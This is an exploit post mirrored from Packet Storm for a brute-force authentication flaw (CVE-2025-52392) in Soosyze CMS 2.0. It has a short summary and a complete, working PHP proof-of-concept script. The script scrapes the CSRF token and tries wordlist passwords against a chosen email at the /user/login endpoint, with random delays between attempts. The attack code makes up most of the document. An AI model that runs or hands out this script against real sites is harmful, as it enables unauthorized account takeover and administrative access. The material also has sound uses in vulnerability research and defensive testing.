Share
## https://sploitus.com/exploit?id=PACKETSTORM:214287
=============================================================================================================================================
    | # Title     : Soosyze CMS 2.0 - Authentication Brute Force Vulnerability                                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://github.com/soosyze/soosyze                                                                                          |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/208515/ & 	CVE-2025-52392
    
    [+] Summary    : Soosyze CMS version 2.0 is vulnerable to a brute-force authentication attack due to the absence of rate limiting, CAPTCHA enforcement, and account lockout mechanisms on the login endpoint `/user/login`.
                     An attacker can repeatedly submit authentication requests using a known email address and a password wordlist, allowing unlimited login attempts until valid credentials are discovered.
                     This vulnerability may lead to full account compromise and unauthorized administrative access.
    
    [+] POC:  php poc.php wordlist.txt
    
    <?php
    
    declare(strict_types=1);
    
    error_reporting(E_ALL);
    ini_set('display_errors', '1');
    
    $baseUrl      = 'http://localhost:8000';
    $loginPath   = '/user/login';
    $formUrl     = $baseUrl . $loginPath;
    
    $emailField  = 'email';
    $passField   = 'password';
    $targetEmail = 'test@test.com';
    
    $defaultWords = [
        '123456',
        'admin',
        'password',
        'qwerty',
        'letmein',
        'admin123',
        'password1'
    ];
    
    $wordlistFile = $argv[1] ?? null;
    $words = $defaultWords;
    
    if ($wordlistFile && is_readable($wordlistFile)) {
        $words = array_map('trim', file($wordlistFile));
    }
    
    $cookieFile = tempnam(sys_get_temp_dir(), 'soosyze_');
    
    function curlRequest(string $url, array $options = []): string
    {
        $ch = curl_init($url);
    
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
        ] + $options);
    
        $response = curl_exec($ch);
        curl_close($ch);
    
        return $response ?: '';
    }
    
    function getLoginForm(string $url, string $cookieFile): string
    {
        return curlRequest($url, [
            CURLOPT_COOKIEJAR => $cookieFile,
            CURLOPT_COOKIEFILE => $cookieFile,
        ]);
    }
    
    function extractCsrfToken(string $html): array
    {
        if (preg_match(
            '/name="([_a-zA-Z0-9:-]*(csrf|token)[_a-zA-Z0-9:-]*)".*?value="([^"]*)"/i',
            $html,
            $m
        )) {
            return [$m[1], $m[3]];
        }
        return ['', ''];
    }
    
    function postLogin(
        string $url,
        string $email,
        string $password,
        string $cookieFile,
        string $tokenName,
        string $tokenValue
    ): string {
        $postData = [
            'email'    => $email,
            'password' => $password
        ];
    
        if ($tokenName && $tokenValue) {
            $postData[$tokenName] = $tokenValue;
        }
    
        return curlRequest($url, [
            CURLOPT_POST => true,
            CURLOPT_POSTFIELDS => http_build_query($postData),
            CURLOPT_COOKIEJAR => $cookieFile,
            CURLOPT_COOKIEFILE => $cookieFile,
            CURLOPT_HTTPHEADER => [
                'Content-Type: application/x-www-form-urlencoded',
                'Origin: ' . parse_url($url, PHP_URL_SCHEME) . '://' . parse_url($url, PHP_URL_HOST),
                'Referer: ' . $url
            ]
        ]);
    }
    
    echo "[*] Starting authorized brute-force PoC on {$formUrl}\n";
    
    $attempt = 0;
    
    foreach ($words as $pw) {
        $attempt++;
    
        $html = getLoginForm($formUrl, $cookieFile);
        [$tokenName, $tokenValue] = extractCsrfToken($html);
    
        $response = postLogin(
            $formUrl,
            $targetEmail,
            $pw,
            $cookieFile,
            $tokenName,
            $tokenValue
        );
    
        if (strpos($response, 'redirect') !== false) {
            echo "[+] Password FOUND: {$pw} (attempt {$attempt})\n";
            break;
        }
    
        echo "[-] Attempt {$attempt}: {$pw}\n";
    
        usleep(random_int(100000, 900000));
    }
    
    @unlink($cookieFile);
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================